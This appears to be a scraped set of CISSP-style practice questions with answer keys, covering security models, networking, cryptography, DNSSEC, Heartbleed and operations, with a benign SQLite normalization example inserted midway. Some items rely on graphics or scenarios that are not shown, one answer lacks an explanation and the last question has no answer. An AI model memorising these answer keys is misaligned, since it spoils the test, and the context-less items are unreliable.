Which of the following is a true statement? A. Because the RPO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD. B. Because the RTO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD. C. Because the MTD must ensure that the RPO is not exceeded, the RTO must normally be shorter than the MTD. D. Because the ROO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD.

B. Because the RTO must ensure that the MTD is not exceeded, the RTO must normally be shorter than the MTD.

Which security model enforces the principle that the security levels of an object should never change and is known as the "strong tranquility" property? A. Biba B. Bell-LaPadula C. Brewer-Nash D. Noninterference

B. Bell-LaPadula models have rigid security policies that are built to ensure confidentiality. The "strong tranquility" property is an inflexible mechanism that enforces the consistent security classification of an object.

Paul has been handed two different smart cards and is told that one is a combi card and one is a hybrid card. What is the difference between the two? A. Both can work as a contact or a contactless card. A combi has two chips and a hybrid card has one chip. B. Both can work as a contact or a contactless card. A hybrid has two chips and a combi card has one chip. C. Both can work as a contact or contactless card, but the hybrid has an antenna. D. Both can work as a contact or a contactless card, but the combi has an antenna.

B. Both can work as a contact or a contactless card. A hybrid has two chips and a combi card has one chip.

Which of the following is used to spot protection within a few inches of the object? A. wave pattern motion detector. B. Capacitance detector. C. Field-powered device. D. Audio detector.

B. Capacitance detector.

Knowing who obtained evidence, what it was, where and when it was obtained, who secured it, and who controlled it, is part of an investigation principle known as_____. A. Due care. B. Chain of Custody. C. Best Evidence Rule. D. Due diligence.

B. Chain of Custody.

Mary is playing around on her computer late at night and discovers a way to compromise a small company's personnel files. She decides to take a look around, but does not steal any information. Is she still committing a crime even if she does not steal any of the information? A. No, since she does not steal any information, she is not committing a crime. B. Yes, she has gained unauthorized access. C. Not if she discloses the vulnerability she exploited to the company. D. Yes, she could jeopardize the system without knowing it.

B. Computer crime can broadly be defined as criminal activity involving an information technology infrastructure, including illegal access, illegal interception, data interference, systems interference, misuse of devices, forgery, and electronic fraud.

Before an effective physical security program can be rolled out, a number of steps must be taken. Which of the following steps comes first in the process of rolling out a security program? A. Create countermeasure performance metrics. B. Conduct a risk analysis. C. Design the program. D. Implement countermeasures.

B. Conduct a risk analysis.

Which of the following best describes what a transaction-processing system provides? A. Redundancy B. Consistency. C. Confidentiality. D. Availability.

B. Consistency.

Ethernet uses a shared medium for all stations on a LAN to communicate, and uses a carrier sense multiple access with collision detection (CSMA/CD) approach to managing communications between stations. Which of the following statements about this protocol best explains how it works? A. A control frame is passed from station to station, granting permission for that station to transmit once it is received. B. Each station is required to monitor the medium for transmissions and only transmit when all other stations are silent. Each station is also responsible for alerting all other stations if it observes more than one station transmitting at the same time. C. Each station is required to monitor the medium for transmissions and only transmit when all other stations are silent. Each station is also responsible for signaling its intent to transmit before doing so. D. A primary station is responsible for determining which of the other stations is due to transmit, by polling each of them at regular intervals to determine which station has data to transmit.

B. Each of the answers above describes a method for sharing a communications medium and managing collisions. With CSMA/CD, each station senses whether another station is already transmitting before beginning to do so, but also senses whether a collision has occurred and notifies all other stations that they need to back off before trying again.

Which of the following best describes the role of the Java Virtual Machine in the execution of Java applets? A. Converts the source code into bytecode and blocks the sandbox B. Converts the bytecode into machine-level code C. Operates only on specific processors within specific operating systems D. Develops the applets, which run in a user's browser

B. Java is an object-oriented, platform-independent programming language. It is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user's browser. Java is platform independent because it creates intermediate code, bytecode, which is not processor specific. The Java Virtual Machine (JVM) then converts the bytecode into machine-level code that the processor on the particular system can understand.

Which of the following is a field of study that focuses on ways of understanding and analyzing data in databases, with concentration on automation advancements? A. Artificial intelligence. B. Knowledge discovery in databases C. kerberos D. ANN.

B. Knowledge discovery in databases

What is the central hub called in a token ring network? A. Star. B. MAU C. PBX. D. MUA.

B. MAU

Which of the following refers to the expected amount of time it will take to get a device fixed and back into production after its failure? A. SLA B. MTTR C. Hot-swap D. MTBF

B. Mean time to repair (MTTR) is the expected amount of time it will take to get a device fixed and back into production after its failure. For a hard drive in a redundant array, the MTTR is the amount of time between the actual failure and the time when, after noticing the failure, someone has replaced the failed drive and the redundant array has completed rewriting the information on the new drive. This is likely to be measured in hours. For a nonredundant hard drive in a desktop PC, the MTTR is the amount of time between when the drive goes down and the point at which the replaced hard drive has been reloaded with the operating system, software, and any backed-up data belonging to the user. This is likely to be measured in days. For an unplanned reboot, the MTTR is the amount of time between the failure of the system and the point in time when it has rebooted its operating system, checked the state of its disks, restarted its applications, allowed its applications to check the consistency of their data, and once again begun processing transactions.

Which of the following is NOT one of the stages of the DHCP lease process? i. Discover ii. Offer. iii. Request. iv. Acknowledgement A. All of them. B. None of them. C. i D. ii

B. None of them.

Robert has been asked to increase the overall efficiency of the sales database by implementing a procedure that structures data to minimize duplication and inconsistencies. What procedure is this? A. Polymorphism B. Normalization C. Implementation of database views D. Constructing schema

B. Normalization is a process that eliminates redundancy, organizes data efficiently, reduces the potential for anomalies during data operations, and improves data consistency within databases. It is a systematic way of ensuring that a database structure is designed properly to be free of certain undesirable characteristics—insertion, update, and deletion anomalies—that could lead to a loss of data integrity.
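The update anomaly the answer mentions is the easiest one to see. The following is an added example, not part of the flashcards: a denormalized orders table repeats each customer's city on every order, so changing the city on one order leaves the others inconsistent; the normalized schema stores the city once and references it by key, and its foreign key also refuses the insertion anomaly of an order for a customer that does not exist. The tables and sample rows are made up, and SQLite is used only because it ships with Python.

```python
"""Normalization: update and insertion anomalies shown with sqlite3.

Added example, not from the flashcards. A denormalized orders table repeats
each customer's city on every order; updating one order leaves the others
stale. The normalized schema keeps the city in one row of a customers table
and references it by key. Tables and sample rows are made up.
"""
import sqlite3


def denormalized_update_anomaly():
    """Cities recorded for customer 'Acme' after an application updates only one order."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE orders (
            order_id INTEGER PRIMARY KEY,
            customer_name TEXT,
            customer_city TEXT,
            item TEXT
        );
        INSERT INTO orders VALUES (1, 'Acme', 'Denver', 'widget');
        INSERT INTO orders VALUES (2, 'Acme', 'Denver', 'gadget');
        INSERT INTO orders VALUES (3, 'Beta', 'Austin', 'widget');
    """)
    # Acme moves; the code path that handles order 1 updates the row it is looking at.
    db.execute("UPDATE orders SET customer_city = 'Boulder' WHERE order_id = 1")
    rows = db.execute(
        "SELECT DISTINCT customer_city FROM orders WHERE customer_name = 'Acme'"
    ).fetchall()
    return {r[0] for r in rows}   # two different cities for one customer


def build_normalized():
    """Customers and orders in separate tables, linked by an enforced foreign key."""
    db = sqlite3.connect(":memory:")
    db.execute("PRAGMA foreign_keys = ON")   # SQLite does not enforce FKs unless asked
    db.executescript("""
        CREATE TABLE customers (
            customer_id INTEGER PRIMARY KEY,
            name TEXT UNIQUE NOT NULL,
            city TEXT NOT NULL
        );
        CREATE TABLE orders (
            order_id INTEGER PRIMARY KEY,
            customer_id INTEGER NOT NULL REFERENCES customers(customer_id),
            item TEXT NOT NULL
        );
        INSERT INTO customers VALUES (1, 'Acme', 'Denver');
        INSERT INTO customers VALUES (2, 'Beta', 'Austin');
        INSERT INTO orders VALUES (1, 1, 'widget');
        INSERT INTO orders VALUES (2, 1, 'gadget');
        INSERT INTO orders VALUES (3, 2, 'widget');
    """)
    return db


def normalized_update():
    """Same scenario after normalization: the city lives in exactly one row."""
    db = build_normalized()
    db.execute("UPDATE customers SET city = 'Boulder' WHERE name = 'Acme'")
    rows = db.execute("""
        SELECT DISTINCT c.city
        FROM orders o JOIN customers c USING (customer_id)
        WHERE c.name = 'Acme'
    """).fetchall()
    return {r[0] for r in rows}   # every Acme order now reports Boulder


def orphan_order_rejected():
    """Insertion anomaly: an order for customer 99, who does not exist, must fail."""
    db = build_normalized()
    try:
        db.execute("INSERT INTO orders VALUES (4, 99, 'widget')")
    except sqlite3.IntegrityError:
        return True
    return False
```

The price of the normalized form is the JOIN on every read, which is the trade-off Robert's efficiency task is really about: normalize to the point where each fact is stored once, and denormalize deliberately, with a documented reason, only where read performance demands it.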

Which of the following is not a true statement about viruses? A. Exist in disguise usually through a common program or file. B. Number one objective is to take up system resources. C. Usually initiates after a user action, such as opening an attachment. D. Requires a host application.

B. Number one objective is to take up system resources.

How does RADIUS allow companies to centrally control remote access? A. Once a user is authenticated a profile is generated based on his security token, which outlines what he is authorized to do within the network. B. Once a user is authenticated a pre-configured profile is assigned to him, which outlines what he is authorized to do within the network. C. Once the RADIUS client authenticates the user, the RADIUS server assigns him a pre-configured profile. D. Once the RADIUS client authenticates the user, the client assigns the user a pre-configured profile.

B. Once a user is authenticated a pre-configured profile is assigned to him, which outlines what he is authorized to do within the network.

John is a network administrator and has been told by one of his network staff members that two servers on the network have recently had suspicious traffic traveling to them and then from them in a sporadic manner. The traffic has been mainly ICMP, but the patterns were unusual compared to traffic on other servers over the last 30 days. John lists the directories and subdirectories on the systems and finds nothing unusual. He inspects the running processes and again finds nothing suspicious. He sees that the systems' NICs are not in promiscuous mode, so he is assured that sniffers have not been planted. Which of the following describes the most likely situation as described in this scenario? A. Servers are not infected, but the traffic illustrates attack attempts. B. Servers have been infected with rootkits. C. Servers are vulnerable and need to be patched. D. Servers have been infected by spyware.

B. Once the level of access is achieved, the attacker can upload a bundle of tools, collectively called a rootkit. A rootkit is software that implements stealth capabilities that are designed to hide the existence of certain processes or programs. Rootkit detection is difficult because a rootkit may be able to subvert the software that is intended to find it.

If an investigator needs to communicate to another investigator, but does not want the hacker to find this traffic, what type of communication should be used? A. digitally signed messages. B. out-of-band messages. C. Forensics frequency. D. Authentication and access control.

B. Out-of-band messages.

Which of the following is NOT a key phase in the identity management lifecycle? A. Provisioning of user accounts as they are brought on board, as well as system accounts as they become necessary for the deployment of new software. B. Privilege escalation as users are eventually promoted up the chain to managerial roles, and as system software is upgraded to include greater functionality. C. periodic user and system account reviews, to ensure that each such account remains necessary and valid. D. Deprovisioning of the accounts of users who have moved, left, or been terminated, as well as any system accounts that are no longer required because the software requiring them has been decommissioned.

B. Privilege escalation as users are eventually promoted up the chain to managerial roles, and as system software is upgraded to include greater functionality.

Amy reads a document from her workstation: 1. Access the Aspen Bridge by telnet. 2. Enter into privileged mode. 3. Execute command . 6 and press Enter. 4. Load the config file. 5. Hit Run. What type of document is Amy reading? A. Policy B. Procedure C. Baseline D. Advisory

B. Procedure

Which of the following is not a responsibility of the memory manager within an operating system? A. Sharing B. Process organization C. Relocation D. Protection.

B. Process Organization.

Which of the following best describes the operating system component that contains the address of an instruction set to be fetched for execution? A. special register. B. Program counter. C. Protection ring. D. Initial load counter.

B. Program counter.

Which access control policy is enforced in an environment that uses containers and implicit permission inheritance using a nondiscretionary model? A. Rule-based B. Role-based C. Identity-based D. Mandatory

B. Roles work as containers for users. The administrator or security professional creates the roles and assigns rights to them and then assigns users to the container. The users then inherit the permissions and rights from the containers (roles), which is how implicit permissions are obtained.

Which of the following best describes separation of duties and job rotation? A. Separation of duties ensures that more than one employee knows how to perform the tasks of a position, and job rotation ensures that one person cannot perform a high-risk task alone. B. Separation of duties ensures that one person cannot perform a high-risk task alone, and job rotation can uncover fraud and ensure that more than one person knows the tasks of a position. C. They are the same thing, but with different titles. D. They are administrative controls that enforce access control and protect the company's resources.

B. Rotation of duties enables a company to have more than one person trained in a position and can uncover fraudulent activities. Separation of duties is put into place to ensure that one entity cannot carry out a critical task alone.

Which markup language allows a company to send service requests and the receiving company to provision access to these services? A. XML B. SPML C. SGML D. HTML

B. Service Provisioning Markup Language (SPML) is a markup language, built on the Extensible Markup Language (XML) framework, that exchanges information about which users should get access to what resources and services. So let's say that an automobile company and a tire company only allow inventory managers within the automobile company to order tires. If Bob logs in to the automobile company's inventory software and orders 40 tires, how does the tire company know that this request is coming from an authorized vendor and user with the Inventory Managers group? The automobile company's software can pass user and group identity information to the tire company's software. The tire company uses this identity information to make an authorization decision that then allows Bob's request for 40 tires to be filled. Since both the sending and receiving companies are following one standard (XML), this type of interoperability can take place.

An assessment whose goal is to assess the susceptibility of an organization to social engineering attacks is best classified as A. Physical testing B. Personnel testing C. Vulnerability testing D. Network testing

B. Social engineering is focused on people, so personnel testing is the best answer.

Packets that contain routing information within their headers are referred to as what? A. broadcasting. B. Source routing C. Forwarding D. Poisoning.

B. Source routing

An activity that alters the state of a system is called a _____. A. Unauthorized intrusion B. State transition C. Moving data from a memory segment to the CPU's registers. D. Moving data from the CPU's registers to the correct memory address.

B. State Transition.

Bob needs to review the source code of a new product a team has been working on, in order to ensure that all user inputs have been properly validated prior to being processed. Which of the following terms is used to describe this activity? A. Dynamic analysis. B. Static analysis C. Fuzzing. D. Debugging.

B. Static analysis

Data in use is commonly A. Using a RESTful protocol for transmission B. Stored in registers C. Being transmitted across the network D. Stored in external storage devices

B. Stored in registers

A key stream generator is used in what type of cipher? A. Block B. Stream C. concealment D. DES.

B. Stream

Which of the following best describes an application of cryptography to protect data in motion? A. Testing software against side-channel attacks B. TLS C. Whole-disk encryption D. EDLP

B. TLS

Bob is a hacker who intends to use social engineering strategies to infiltrate a former employer. After doing thorough research, he begins calling the customer service line to find the weakest representative to attack. He calls over and over again, trying to talk to many different representatives. What phase of the social engineering attack is Bob involved in? A. Dumpster diving. B. Target selection. C. Intelligence gathering. D. Attack mode.

B. Target selection.

What is a synthetic transaction? A. A bogus user transaction that must be disallowed B. A scripted process used to emulate user behavior C. User behavior intended to falsify records D. A scripted process by an attacker used to violate policy

B. Testing applications commonly involves the need to emulate usual user behaviors. However, in a test environment, the typical load of user activity is unavailable. Consequently, scripts of common user transactions can be constructed to facilitate various forms of tests.

Use the following scenario to answer Questions 28-30. Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters "%20" and "../". The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database. Which of the following best describes attacks that could be taking place against this organization? A. Cross-site scripting and certification stealing B. URL encoding and directory traversal attacks C. Parameter validation manipulation and session management attacks D. Replay and password brute-force attacks

B. The characters "%20" are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters "../" can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible. This is commonly referred to as a path or directory traversal attack.

Which of the following is true about IEEE 802.3 (Ethernet) and 802.11 (Wi-Fi)? A. They are similar protocols at OSI layer 3, designed to solve different link layer problems. B. They are similar protocols at OSI layer 2, designed to solve different physical layer problems. C. They are essentially the same protocol at OSI layer 2. D. They are essentially the same protocol at OSI layer 5.

B. They are similar protocols at OSI layer 2, designed to solve different physical layer problems.

How can a backup strategy be made most effective? A. By ensuring that all user data is backed up B. By testing restoration procedures C. By backing up database management systems (DBMSs) via their proprietary methods D. By reviewing backup logs to ensure they are complete

B. Unless the ability to restore from backups successfully is tested routinely, no other activities around data retention have value.

A widely used family of symmetric algorithms is called block ciphers. When these types of algorithms are being used, a message that needs to be encrypted is segmented into individual blocks and each block is encrypted. These algorithms work in different modes, and each mode has a specific use case. Which mode is being represented in the graphic and what is its most common use case? A. Electronic Code Book mode is used when individual and unique keys are needed to encrypt each block. B. Counter mode is used when encryption and decryption need to take place in parallel and independent block recovery is available. C. Cipher Block Chaining mode is used when added complexity is required by incorporating subkeys for each block encryption function. D. Output Feedback mode is used when segmented ciphertext blocks are required for inline encryption functionality.

B. Unlike most of the other block cipher modes, Counter (CTR) mode does not incorporate any chaining between blocks that are being encrypted. This means that the receiving end does not have to wait and receive all of the message blocks before starting to decrypt the message. The individual blocks are not coupled or dependent upon each other. Since the receiving end can decrypt the blocks as soon as they are received, the decryption process happens faster compared to other modes. Since the blocks are not chained and dependent upon each other, the individual message blocks can be independently recovered if necessary. Encryption modes that chain the blocks together do not allow for independent recovery—if one block gets corrupted, subsequent blocks become irrecoverable. For these reasons, CTR is most commonly used in newer versions of protocols such as IPSec and in technologies such as Wi-Fi. CTR mode is used when data within multiple packets needs to be transmitted between two systems over a network connection; thus, it is used by networking protocols. Other block modes, such as Electronic Code Book, are most often used within applications, not protocols.

Monitoring temperature and humidity levels in equipment rooms is a critical security control that operations groups must achieve. What type of control is this? A. Logical B. Environmental C. Deterrent D. Administrative

B. environmental

Which of the following scenarios requires a "trusted recovery"? A. An application exits unexpectedly. B. A system is rebooted after a kernel failure. C. A backup procedure fails. D. A system is rebooted as part of routine maintenance.

B. a system is rebooted after a kernel failure.

Which of the following best describes the separation of duties and job rotation? A. separation of duties ensures that more than one employee knows how to perform the tasks of a position, and job rotation ensures that one person cannot perform a high-risk task alone. B. separation of duties ensures that one person cannot perform the high-risk tasks alone, and job rotation can uncover fraud and ensure that more than one person knows the tasks of a position. C. they are the same thing with different titles. D. they are administrative controls that enforce access control and protect the company's resources.

B. separation of duties ensures that one person cannot perform high-risk task alone, and job rotation can uncover fraud and ensure that more than one person knows the tasks of a position.

Charlie is a new security manager at a textile company that develops its own proprietary software for internal business processes. Charlie has been told that the new application his team needs to develop must comply with the ISO/IEC 42010 standard. He has found out that many of the critical applications have been developed in the C programming language and has asked for these applications to be reviewed for a specific class of security vulnerabilities. Which of the following best describes the standard Charlie's team needs to comply with? A. International standard on system design to allow for better quality, interoperability, extensibility, portability, and security. B. International standard on system security to allow for better threat modeling. C. International standard on system architecture to allow for better quality, interoperability, extensibility, portability, and security. D. International standard on system architecture to allow for better quality, extensibility, portability, and security.

C. International standard on system architecture to allow for better quality, interoperability, extensibility, portability, and security.

Dogs are a fairly common physical control in particularly high security environments. Which of the following statements is most important when considering their deployment? A. Their sense of smell is much more acute than that of humans, and can even exceed the ability of other physical systems to detect the presence of some chemical compounds in minute amounts. B. They can be trained to effectively disable and safely detain an intruder until human agents can arrive and gain more positive control. C. They are incapable of making nuanced judgements as to who is a friend and who is foe, and so pose a significant risk to the safety of personnel. D. They can be easily disabled by an attacker via lethal force, without consideration of more consequential tactical or legal results of a lethal attack on human guards.

C.

What is the annualized loss expectancy (ALE)? A. $480,000 B. $32,000 C. $48,000 D. 6

C. $48,000

A static charge of ___ volts is able to cause disk drive data loss. A. 550 B. 1000 C. 1500 D. 2500

C. 1500

Database software performs three main types of integrity services: semantic, referential, and entity. Which of the following correctly describes one of these services? i. A semantic integrity mechanism makes sure structural and semantic rules are enforced. ii. A database has referential integrity if all foreign keys reference existing primary keys. iii. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A. ii B. ii, iii C. i, ii, iii D. i, ii

C. A semantic integrity mechanism makes sure structural and semantic rules are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database. A database has referential integrity if all foreign keys reference existing primary keys. There should be a mechanism in place that ensures no foreign key contains a reference to a primary key of a nonexistent record, or a null value. Entity integrity guarantees that the tuples are uniquely identified by primary key values. For the sake of entity integrity, every tuple must contain one primary key. If it does not have a primary key, it cannot be referenced by the database.

A reciprocal agreement is best described how? A. A site that has some computers and environmental controls B. A site that has fully redundant systems, software, and configurations. C. A site that is in use by another company already. D. An agreement that is enforceable.

C. A site that is in use by another company already.

What is the final step in authorizing a system for use in an environment? A. Certification B. Security evaluation and rating C. Accreditation D. Verification

C. Accreditation

Systems that are built on the OSI framework are considered open systems. What does this mean? A. They do not have authentication mechanisms configured by default. B. They have interoperability issues. C. They are built with internationally accepted protocols and standards so they can easily communicate with other systems. D. They are built with international protocols and standards so they can choose what types of systems they will communicate with.

C. An open system is a system that has been developed based on standardized protocols and interfaces. Following these standards allows the systems to interoperate more effectively with other systems that follow the same standards.

Which of the following proxies cannot make access decisions based upon protocol commands? A. Application B. Packet filtering C. Circuit D. Stateful

C. Application and circuit are the only types of proxy-based firewall solutions listed here. The others do not use proxies. Circuit-based proxy firewalls make decisions based on header information, not the protocol's command structure. Application-based proxies are the only ones that understand this level of granularity about the individual protocols.

Which of the following is the set of steps necessary to control changes in source code? A. prototype, test, and implement. B. Implement, Version, and deploy. C. Approve, document, and test. D. Approve, code, and test.

C. Approve, document, and test.

Host-based intrusion detection systems (IDS) mainly utilize which of the following to perform their analysis? A. Network throughput data. B. Downtime of connected devices. C. Audit logs and system files D. Network packets.

C. Audit logs and system files

Roles, groups, location, and time of day are all criteria for which type of validation decision? A. Identification. B. Authentication. C. Authorization. D. Accountability.

C. Authorization.

When selecting and implementing information asset protection standards, why is tailoring an important process? A. Because the penalties for noncompliance provided by the chosen standard may be too severe and unrealistic. B. Because some of the provisions of the chosen standard might not apply to your organization's environment. C. Because some of the provisions of the chosen standard might better address your organization's environment if modified significantly. D. Because not all standards are a good fit for your organization, and so it is important to choose the best one.

C. Because some of the provisions of the chosen standard might better address your organization's environment if modified significantly.

Data in motion is commonly A. Using a RESTful protocol for transmission B. Stored in registers C. Being transmitted across the network D. Stored in external storage devices

C. Being transmitted across the network

Establishing data classification levels within a company is essential as part of an overall security program. Of the roles listed, who would be the best choice to sponsor a data classification program? A. IT administrator B. Security officer C. Chief information officer D. Security awareness trainer

C. Chief information officer.

Terry is a security manager for a credit card processing company. His company uses internal DNS servers, which are placed within the LAN, and external DNS servers, which are placed in the DMZ. The company also relies upon DNS servers provided by its service provider. Terry has found out that attackers have been able to manipulate several DNS server caches to point employee traffic to malicious websites. Which of the following best describes the solution this company should implement? A. IPSec B. PKI C. DNSSEC D. MAC-based security

C. DNSSEC (DNS security, which is part of the many current implementations of DNS server software) works within a PKI and uses digital signatures, which allows DNS servers to validate the origin of a message to ensure that it is not spoofed and potentially malicious. If DNSSEC were enabled on server A, then server A would, upon receiving a response, validate the digital signature on the message before accepting the information to make sure that the response is from an authorized DNS server. So even if an attacker sent a message to a DNS server, the DNS server would discard it because the message would not contain a valid digital signature. DNSSEC allows DNS servers to send and receive only authenticated and authorized messages between themselves and thwarts the attacker's goal of poisoning a DNS cache table.

__________________ is a set of extensions to DNS that provides to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attack types. A. Resource records B. Zone transfer C. DNSSEC D. Resource transfer

C. DNSSEC is a set of extensions to DNS that provides to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attack types. DNSSEC is a suite of Internet Engineering Task Force (IETF) specifications for securing services provided by the DNS as used on IP networks.

How many steps are required per the Dynamic Host Configuration Protocol (DHCP) for the initial assignment of an IP address, what are they, and in what order do they occur? A. Three: SYN, SYN/ACK, ACK B. Three: discover, offer, ack. C. Four: discover, offer, request, ack. D. Four: request, offer, accept, ack.

C. Four: discover, offer, request, ack.

What would indicate that a message had been modified? A. The public key has been altered. B. The private key has been altered. C. The message digest has been altered. D. The message has been encrypted properly.

C. Hashing algorithms generate message digests to detect whether modification has taken place. The sender and receiver independently generate their own digests, and the receiver compares these values. If they differ, the receiver knows the message has been altered.

What is the difference between hierarchical storage management and storage area network technologies? A. HSM uses optical or tape jukeboxes, and SAN is a standard of how to develop and implement this technology. B. HSM and SAN are one and the same. The difference is in the implementation. C. HSM uses optical or tape jukeboxes, and SAN is a network of connected storage. D. SAN uses optical or tape jukeboxes, and HSM is a network of connected storage systems.

C. Hierarchical storage management (HSM) provides continuous online backup functionality. It combines hard disk technology with the cheaper and slower optical or tape jukeboxes. The HSM system dynamically manages the storage and recovery of files, which are copied to storage media devices that vary in speed and cost. The faster media hold the data that is accessed more often, and the seldom-used files are stored on the slower devices, or near-line devices. The storage media could include optical disks, magnetic disks, and tapes. This functionality happens in the background without the knowledge of the user or any need for user intervention. A storage area network (SAN), on the other hand, consists of numerous storage devices linked together by a high-speed private network and storage-specific switches. When a user makes a request for a file, he does not need to know which server or tape drive to go to—the SAN software finds it and provides it to the user.

Which of the following best describes the type of solution Ron's team needs to implement? A. RAID and clustering B. Storage area networks C. High availability D. Grid computing and clustering

C. High availability (HA) is a combination of technologies and processes that work together to ensure that critical functions are always up and running at the necessary level. To provide this level of high availability, a company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities.

Which of the following has an incorrect definition mapping? i. Civil (code) law: Based on previous interpretations of laws ii. Common law: Rule-based law, not precedent-based iii. Customary law: Deals mainly with personal conduct and patterns of behavior iv. Religious law: Based on religious beliefs of the region A. i, iii B. i, ii, iii C. i, ii D. iv

C. i, ii

Because identification is critical to the issue of accountability, companies should follow strict guidelines. Which would not be considered a good practice in implementing identification access control? A. Enforce naming standards. B. IDs should be unique. C. IDs should be job descriptive. D. IDs must be easily validated.

C. IDs should be job descriptive.

A financial institution has developed its internal security program based upon the ISO/IEC 27000 series. The security officer has been told that metrics need to be developed and integrated into this program so that effectiveness can be gauged. Which of the following standards should be followed to provide this type of guidance and functionality? A. ISO/IEC 27002 B. ISO/IEC 27003 C. ISO/IEC 27004 D. ISO/IEC 27005

C. ISO/IEC 27004:2016, which is used to assess the effectiveness of an ISMS and the controls that make up the security program as outlined in ISO/IEC 27001. ISO/IEC 27004 is the guideline for information security management measurement and metrics framework.

John covertly learns the user ID and password of a higher-ranked technician and uses the credentials to access certain areas of a network. What term describes what John has done? A. IP spoofing B. Backdooring C. Masquerading D. Data diddling

C. Masquerading

Bethany is working on a mandatory access control (MAC) system. She has been working on a file that was classified as Secret. She can no longer access this file because it has been reclassified as Top Secret. She deduces that the project she was working on has just increased in confidentiality and she now knows more about this project than her clearance and need-to-know allows. Which of the following refers to a concept that attempts to prevent this type of scenario from occurring? A. Covert storage channel B. Inference attack C. Noninterference D. Aggregation

C. Multilevel security properties can be expressed in many ways, one being noninterference. This concept is implemented to ensure that any actions that take place at a higher security level do not affect or interfere with actions that take place at a lower level. So if an entity at a higher security level performs an action, it cannot change the state for the entity at the lower level. If a lower-level entity were aware of a certain activity that took place by an entity at a higher level and the state of the system changed for this lower-level entity, the entity might be able to deduce too much information about the activities of the higher state, which in turn is a way of leaking information.

Which of the following does not describe proper use of a fire extinguisher? A. Must be in an area with electrical equipment. B. Must be visible. C. Must be inspected once a year. D. Must contain a fire suppression agent appropriate for the area.

C. Must be inspected once a year.

Which is not considered a firewall architecture used to protect networks? A. Screened host. B. Screened subnet. C. NAT gateway. D. Dual-homed host.

C. NAT gateway

When providing a security report to management, which of the following is the most important component? A. A list of threats, vulnerabilities, and the probabilities that they will occur B. A comprehensive list of the probabilities and impacts of adverse events anticipated C. An executive summary that is comprehensive but does not exceed two pages D. An executive summary that is as long as is necessary to be technically comprehensive and that includes the lists referenced in options A and B

C. No matter how technically comprehensive a report to management must be, the executive summary should never exceed two pages. IT security professionals must understand that the risks posed to an enterprise by data compromise are only one of many concerns that senior management must try to understand and prioritize. C-level executives have to be concerned with a lot of risks, and highly technical threats with which they are not familiar may be difficult for them to sort out appropriately. That means that it is the primary job of the IT security professional to summarize the risks in a way that makes sense to management, and as briefly as possible.

Media sanitization and destruction prevent ___. A. collusion B. Social Engineering. C. Object reuse. D. Replay.

C. Object reuse.

Which of the following means of data removal makes the data unrecoverable even with extraordinary effort, such as with physical forensics in a laboratory? A. Deletion of the data. B. Sanitation of the media. C. Purging via overwriting. D. None of these will work.

C. Purging via overwriting

Sometimes when studying for an industry certification exam like the CISSP, people do not fully appreciate that the concepts and technologies they need to learn to pass the test directly relate to real-world security issues. To reinforce how exam-oriented theoretical concepts directly relate to the practical world of security, choose the answer that best describes the Heartbleed SSL/TLS vulnerability, which is considered to be one of the most critical attack vectors in the history of the Internet. A. Digital certificates were stolen through a tunneled attack within the SSL and TLS protocols. B. Certificate authorities were compromised when their SSL and TLS connections were hijacked through the use of TCP session hijacking. C. Bounds checking was not implemented, allowing sensitive data to be obtained by attackers from memory segments on web servers. D. Cross-site scripting was allowed to take place on web servers that ran a vulnerable version of Java.

C. OpenSSL implemented an SSL/TLS extension outlined by the IETF in RFC 6520 that allows a connection to remain active between two systems communicating over this security protocol. The way that OpenSSL implemented this extension allows the sending system to request data that it is not authorized to access, such as web server private keys. When an attacker obtains a web server's private key, this circumvents all of the security provided by the public key infrastructure (PKI) environment that the SSL/TLS protocol is based upon. The point is that if you do not really understand how a PKI works, how private and public keys work, the role of digital certificates in security protocols such as SSL/TLS, and what bounds checking and buffer over-reads are, you won't understand straightforward vulnerabilities such as Heartbleed. While you will not be asked about a specific vulnerability on the CISSP exam, you will be expected to understand all of the components and technologies involved that allow such a vulnerability to be so dangerous and powerful.

There are several types of password management approaches used by identity management systems. Which of the following reduces help-desk call volume, but is also criticized for the ease with which a hacker could gain access to multiple resources if a password is compromised? A. Management password reset B. Self-service password reset C. Password synchronization D. Assisted password reset

C. Password synchronization is designed to reduce the complexity of keeping up with different passwords for different systems. Password synchronization technology can allow users to maintain a single password across multiple systems by transparently synchronizing the password to other systems and applications. This reduces help-desk call volume. One criticism of this approach is that since only one password is used to access different resources, now the hacker only has to figure out one credential set to gain unauthorized access to all resources.

Which of the following statements correctly describes passwords? A. They are the least expensive and most secure. B. They are the most expensive and least secure. C. They are the least expensive and least secure. D. They are the most expensive and most secure.

C. Passwords provide the least amount of protection, but are the cheapest because they do not require extra readers (as with smart cards and memory cards), do not require devices (as do biometrics), and do not require a lot of overhead in processing (as in cryptography). Passwords are the most common type of authentication method used today.

When a system needs to send data to an end user, that data may have to travel over different networking protocols to get to the destination. The different protocol types depend upon how far geographically the data needs to travel, the types of intermediate devices involved, and how this data needs to be protected during transmission. In the following graphic, which two WAN protocols are missing, and what is the best reasoning for their functionality in the transmission scenario being illustrated? A. PPTP is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a multiplexed telecommunication link. B. L2FP is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a serial telecommunication link. C. L2TP is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a serial telecommunication link. D. IPSec tunnel mode is being used since the traffic needs to travel over different WAN technologies. PPP is being used because the "last leg" of the transmission is over a multiplexed telecommunication link.

